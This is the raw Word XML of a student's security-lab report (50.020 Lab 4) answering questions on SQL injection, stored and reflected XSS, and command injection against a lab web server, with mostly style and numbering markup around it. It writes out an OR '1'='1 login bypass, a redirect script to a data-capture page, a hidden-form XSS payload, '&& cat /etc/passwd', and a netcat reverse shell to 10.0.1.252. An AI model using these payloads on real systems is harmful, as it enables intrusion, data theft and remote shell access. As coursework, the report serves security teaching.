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header0.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+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List Paragraph"/>
        <w:ind w:hanging="360"/>
        <w:ind w:left="360"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:hanging="360"/>
        <w:ind w:left="785"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1110111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Explain the string you used for the SQL injection and explain why it works.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The string I used for username and password was 1’ OR ‘1’ = ‘1. With 1’ OR ‘1’ = ‘1, the SQL statement at the server becomes </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:firstLine="360"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM accounts WHERE username= ‘1’ or ‘1’=’1’ AND password=’1’ or ‘1’=’1’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="1031"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">As ‘1’=’1’ is always true, the above statement will just return all the values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:hanging="360"/>
        <w:ind w:left="785"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1110111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">What is the table name used to display user details?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The table name used to display user details was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:hanging="360"/>
        <w:ind w:left="785"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1110111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">What are the fields in this table?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The fields in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">accounts </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">table include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Username</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Password</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Signature</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:hanging="360"/>
        <w:ind w:left="360"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:hanging="360"/>
        <w:ind w:left="785"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1110111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Explain which content you inserted in the second order attack, and how it works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The content I inserted in the second order attack is the following.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">&lt;SCRIPT&gt;window.location="http://10.0.1.250/index.php?page=capture-data.php"&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">window.location calls for a redirection to a specific link and the link provided in the script is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.0.1.250/index.php?page=capture-data.php, the web page that records down desired information of the users who are accessing the website. In this way, we can redirect innocent users who are interested in blogging to the recording page and get their information.</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:hanging="360"/>
        <w:ind w:left="785"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1110111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Explain the flask script you wrote to create the POST request for the first-order attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     &lt;form action="http://10.0.1.250/index.php?page=dns-lookup.php" method="post" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">          &lt;input type=hidden name='target_host' value="&lt;script src='capture-data.php'&gt;&lt;/script&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">          &lt;/input&gt;		</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">          &lt;input type=hidden name='dns-lookup-php-submit-button' value="Lookup DNS" method="post"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">          &lt;/input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">          &lt;input type=submit name='Submit' value="Submit" method="get"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">          &lt;/input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="both"/>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Firstly, the form has the address of http://10.0.1.250/index.php?page=dns-lookup.php, which is the original adress for the POST method for DNS lookup. Other than that, there are hidden objects like ‘target_host’ and ‘dns-lookup-php-submit-button’. ‘target_host’ sets the value to the phpsession ID. So when the user presses the button, attacker is able to forward the user to the legitimate page while redirecting him also to the data recording page so that uesr’s information can be collected by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:hanging="360"/>
        <w:ind w:left="360"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:hanging="360"/>
        <w:ind w:left="785"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1110111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Explain which command you used to obtain the content of “/etc/passwd”, and why it works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="center"/>
        <w:ind w:firstLine="0"/>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:jc w:val="left"/>
        <w:ind w:firstLine="0"/>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The server parses the text input from the user and concatenates to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">With &amp;&amp;, you can execute another command cat, which opens the file at /etc/passwd. So when the server executes nslookup &amp;&amp; cat /etc/passwd, the server runs both commands and therefore the attacker is able to see the contents of /etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:left="785"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:hanging="360"/>
        <w:ind w:left="785"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1110111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Explain which command you used to obtain the reverse shell, and why it works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:firstLine="0"/>
        <w:ind w:left="785"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="List Paragraph"/>
        <w:ind w:firstLine="0"/>
        <w:ind w:left="785"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; nc -e /bin/sh 10.0.1.252 8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0"/>
        <w:ind w:left="785"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0"/>
        <w:ind w:left="785"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="hId0"/>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
      <w:pgMar w:top="1701" w:left="1440" w:right="1440" w:bottom="1440"/>
      <w:cols w:num="1" w:sep="off" w:equalWidth="1"/>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header0.xml><?xml version="1.0" encoding="utf-8"?>
<w:hdr xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:p>
    <w:pPr>
      <w:pStyle w:val="header"/>
    </w:pPr>
    <w:r>
      <w:rPr/>
      <w:t xml:space="preserve">50.020 Security Lab 4</w:t>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="header"/>
    </w:pPr>
    <w:r>
      <w:rPr/>
      <w:t xml:space="preserve">Dabin Lee </w:t>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="header"/>
    </w:pPr>
    <w:r>
      <w:rPr/>
      <w:t xml:space="preserve">1000727</w:t>
    </w:r>
  </w:p>
</w:hdr>
</file>

<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:abstractNum w:abstractNumId="1110000">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%2."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%3."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%5."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%6."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%8."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%9."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1110111">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%3."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%4."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%6."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%7."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%9."/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1110000">
    <w:abstractNumId w:val="1110000"/>
  </w:num>
  <w:num w:numId="1110111">
    <w:abstractNumId w:val="1110111"/>
  </w:num>
</w:numbering>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basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Block Text">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:left="1440"/>
      <w:ind w:right="1440"/>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Box List">
    <w:name w:val="Box List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bullet List">
    <w:name w:val="Bullet List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Chapter Heading">
    <w:name w:val="Chapter Heading"/>
    <w:basedOn w:val="Numbered Heading 1"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents 1">
    <w:name w:val="Contents 1"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents 2">
    <w:name w:val="Contents 2"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents 3">
    <w:name w:val="Contents 3"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="2160"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents 4">
    <w:name w:val="Contents 4"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="2880"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents Header">
    <w:name w:val="Contents Header"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:jc w:val="center"/>
      <w:spacing w:after="120"/>
      <w:spacing w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
      <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:hAnsi="Liberation Sans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Dashed List">
    <w:name w:val="Dashed List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Default Paragraph Font">
    <w:name w:val="Default Paragraph Font"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Diamond List">
    <w:name w:val="Diamond List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Endnote">
    <w:name w:val="Endnote"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="288"/>
      <w:ind w:left="288"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Endnote Reference">
    <w:name w:val="Endnote Reference"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Endnote Text">
    <w:name w:val="Endnote Text"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Footer Char">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footnote">
    <w:name w:val="Footnote"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="288"/>
      <w:ind w:left="288"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Footnote Reference">
    <w:name w:val="Footnote Reference"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footnote Text">
    <w:name w:val="Footnote Text"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Hand List">
    <w:name w:val="Hand List"/>
    <w:basedOn w:val="_Normal"/>
    <w:pPr>
      <w:ind w:hanging="432"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Header Char">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="Default Paragraph Font"/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="60"/>
      <w:spacing w:before="440"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="34"/>
      <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:hAnsi="Liberation Sans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="60"/>
      <w:spacing w:before="440"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
      <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:hAnsi="Liberation Sans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="60"/>
      <w:spacing w:before="440"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:hAnsi="Liberation Sans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading 4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="_Normal"/>
    <w:next w:val="_Normal"/>
    <w:pPr>
      <w:spacing w:after="60"/>
      <w:spacing w:before="440"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
      <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:hAnsi="Liberation Sans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heart List">
